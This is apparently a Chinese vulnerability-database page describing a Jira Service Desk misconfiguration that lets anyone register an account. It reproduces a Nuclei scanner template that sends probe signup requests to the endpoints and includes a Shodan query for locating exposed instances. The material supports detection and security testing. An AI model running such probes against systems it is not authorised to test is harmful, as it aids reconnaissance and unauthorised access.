jira-servicedesk-signup: Atlassian Jira Service Desk Signup

日期: 2025-08-01 | 影响软件: Jira Service Desk | POC: 已公开

漏洞描述

This instance of Atlassian JIRA is misconfigured to allow an attacker to sign up (create a new account) just by navigating to the signup page that is accessible at the URL /servicedesk/customer/user/signup. After the attacker has created a new account it's possible for him/her to access the support portal.

PoC代码[已公开]

id: jira-servicedesk-signup

info:
  name: Atlassian Jira Service Desk Signup
  author: TechbrunchFR
  severity: medium
  description: This instance of Atlassian JIRA is misconfigured to allow an attacker to sign up (create a new account) just by navigating to the signup page that is accessible at the URL /servicedesk/customer/user/signup. After the attacker has created a new account it's possible for him/her to access the support portal.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/atlassian-jira-servicedesk-misconfiguration/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-287
    cpe: cpe:2.3:a:atlassian:jira_service_management:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    shodan-query: http.component:"Atlassian Jira"
    product: jira_service_management
    vendor: atlassian
  tags: atlassian,servicedesk,jira,confluence,vuln

http:
  - raw:
      - |
        GET /servicedesk/customer/user/signup HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /servicedesk/customer/user/signup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/servicedesk/customer/user/signup

        {"email":"","fullname":"{{randstr}}","password":"","captcha":"","secondaryEmail":""}
      - |
        GET /secure/Signup!default.jspa HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /secure/Signup.jspa HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}
        Referer: {{RootURL}}/secure/Signup.jspa

        email=&fullname={{randstr}}&username=&password=&Signup=Sign+up

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - 'signup.validation.errors'
          - 'signup-username-error'
        condition: or
# digest: 490a0046304402205a1779fb618c65eac69ee431878d85bf7e60c6a7b7f6ecda9cf0ffe698a6cb110220054231abf21cd90a5bcbdd83fd618f60ae812da6f79e1f5dbb9e2746cb780a8a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/jira/jira-servicedesk-signup.yaml

相关漏洞推荐